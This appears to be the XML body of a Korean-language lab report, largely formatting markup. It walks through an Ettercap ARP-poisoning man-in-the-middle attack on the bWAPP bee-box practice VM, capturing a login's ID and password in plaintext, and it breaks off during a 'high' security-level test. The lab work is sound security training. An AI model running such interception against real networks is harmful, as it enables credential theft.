    <w:p w14:paraId="1EF14D4B" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26441">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54B438F4" wp14:editId="08B2C9FF">
            <wp:extent cx="5760000" cy="3194864"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2476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4864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2F0A3E" w14:textId="51B0E595" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>호스트 목록</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8B7C0" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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EBE2C3" wp14:editId="49DED20E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>832352</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>620395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2541270" cy="1549868"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="1270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15498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31C69" id="직사각형 6" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:65.55pt;margin-top:48.85pt;width:200.1pt;height:122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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"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3FEC2D2" wp14:editId="6F84E321">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-165207</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10250309"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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02503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5B727" id="직사각형 10" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:-13pt;width:533.25pt;height:807.1pt;z-index:-251569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  <w:r w:rsidRPr="004D4939">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="580A57F5" wp14:editId="7C9C5416">
            <wp:extent cx="5760000" cy="3400305"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1016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00305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9E28AE" w14:textId="612A3E2F" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>타겟 설정</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B4C37" w14:textId="1183DF48" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="000C0D36" w:rsidP="000C0D36">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Add to Target 1: </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">타겟 </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>IP (192.168.0.147)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F7ABE1" w14:textId="07D3FAAC" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="000C0D36" w:rsidP="000C0D36">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Add to Target 2: </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">타겟 </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>IP (192.168.0.146)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70899EAB" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/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F90E5E" wp14:editId="486D5732">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>841375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2896166</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2040757" cy="331771"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="1143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757" cy="3317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250A" id="직사각형 12" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:66.25pt;margin-top:228.05pt;width:160.7pt;height:26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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4939">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1691B80A" wp14:editId="265FFD85">
            <wp:extent cx="5759128" cy="3269716"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="2603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3925" cy="3272440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5FCE5E3" w14:textId="77777777" w:rsidR="0016435C" w:rsidRDefault="0016435C" w:rsidP="0016435C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FC994A" w14:textId="3F6FA853" w:rsidR="00AE7893" w:rsidRPr="0016435C" w:rsidRDefault="00AE7893" w:rsidP="0016435C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:left="1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016435C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [MITM]–[ARPpoisoning…]–[Sniffremoteconnection]-</w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>k]</w:t>
      </w:r>
      <w:r w:rsidR="002D35C4" w:rsidRPr="0016435C">
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D35C4">
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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582A767D" wp14:editId="70107FD6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772275" cy="10250309"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="110" name="직사각형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02503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46C33" id="직사각형 110" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:807.1pt;z-index:-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F835B6" wp14:editId="7CE54E6C">
            <wp:extent cx="5760000" cy="3841826"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2540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1826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914DE8" w14:textId="6CA7349E" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26441">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Add to Target 1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에서 b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">ee-box </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>접속 후</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>로그인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61665C3A" w14:textId="32ACBEA4" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="000C0D36" w:rsidP="000C0D36">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>아이디:</w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">ee, </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>패스워드:</w:t>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EECF796" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="800" w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="728189C8" wp14:editId="77C15902">
            <wp:extent cx="5760000" cy="2291816"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1333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91816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E3049E" w14:textId="60E657B9" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>로그인에 성공했다는 메시지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734F40B" w14:textId="520D1107" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>스니핑 결과 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5583313F" w14:textId="7E49C760" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ettercap </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>상태 표시 패널에 사용자가</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>페이지에 입력한 아이디와 비밀번호가 출력되고 전달되는 값들도 평문으로 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25052344" w14:textId="7A3B4FB8" w:rsidR="00AE7893" w:rsidRDefault="002D35C4" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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506E2FF1" wp14:editId="5AE74114">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-153824</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10250309"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="111" name="직사각형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02503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591A0" id="직사각형 111" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:-12.1pt;width:533.25pt;height:807.1pt;z-index:-25146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  <w:r w:rsidR="00AE789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82548E" wp14:editId="5AF28B33">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2372660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5053263" cy="356135"/>
                <wp:effectExtent l="19050" t="19050" r="14605" b="2540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3263" cy="356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6C792" id="직사각형 23" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:186.8pt;width:397.9pt;height:28.05pt;z-index:251750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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="00C11CC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25D30589" wp14:editId="0B6C7E86">
            <wp:extent cx="5760000" cy="2880341"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="15875"/>
            <wp:docPr id="72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9FC905C-A114-46A0-A209-CD5F12DDC6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9FC905C-A114-46A0-A209-CD5F12DDC6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341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26B853" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00167C04" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pP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E7893" w:rsidRPr="00167C04" w14:paraId="4C064175" w14:textId="77777777" w:rsidTr="002D35C4">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="557A3313" w14:textId="2F87B42D" w:rsidR="00AE7893" w:rsidRPr="00B827FF" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:ind w:leftChars="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B827FF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보안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 레벨 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B827FF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high </w:t>
            </w:r>
            <w:r w:rsidRPr="00B827FF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공격시도 결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="270A1260" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00B827FF" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>보안 레벨 선택 및 시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486FC3CB" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00B827FF" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Main-in-the-Middle Attack (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B71133" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00B827FF" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">igh </w:t>
      </w:r>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>선택 후, set 클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B8BD2" w14:textId="63463044" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="320" w:firstLine="800"/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B67F31" wp14:editId="5F20CED8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3776880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>929640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1645920" cy="442762"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="14605"/>
                <wp:wrapNone/>
                <wp:docPr id="77" name="직사각형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427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189F2" id="직사각형 77" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:297.4pt;margin-top:73.2pt;width:129.6pt;height:34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2152F0" wp14:editId="1DE1537E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3806190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>668555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1905802" cy="183081"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="26670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802" cy="183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7309B" id="직사각형 76" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:299.7pt;margin-top:52.65pt;width:150.05pt;height:14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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A8F7C3" wp14:editId="25C3E39E">
            <wp:extent cx="5760000" cy="1607773"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="12065"/>
            <wp:docPr id="73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44B0F710-F285-4853-9EC0-9C08533B37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44B0F710-F285-4853-9EC0-9C08533B37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07773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FCFDD44" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00B827FF" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">TTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00B827FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">로그인 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146872B7" w14:textId="42FDFC0F" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="320" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24BBAD02" wp14:editId="21249927">
            <wp:extent cx="5760000" cy="2150104"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2222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50104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6059772" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29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결과</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8FB666" w14:textId="7458F209" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">sm_mitm_1.php </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
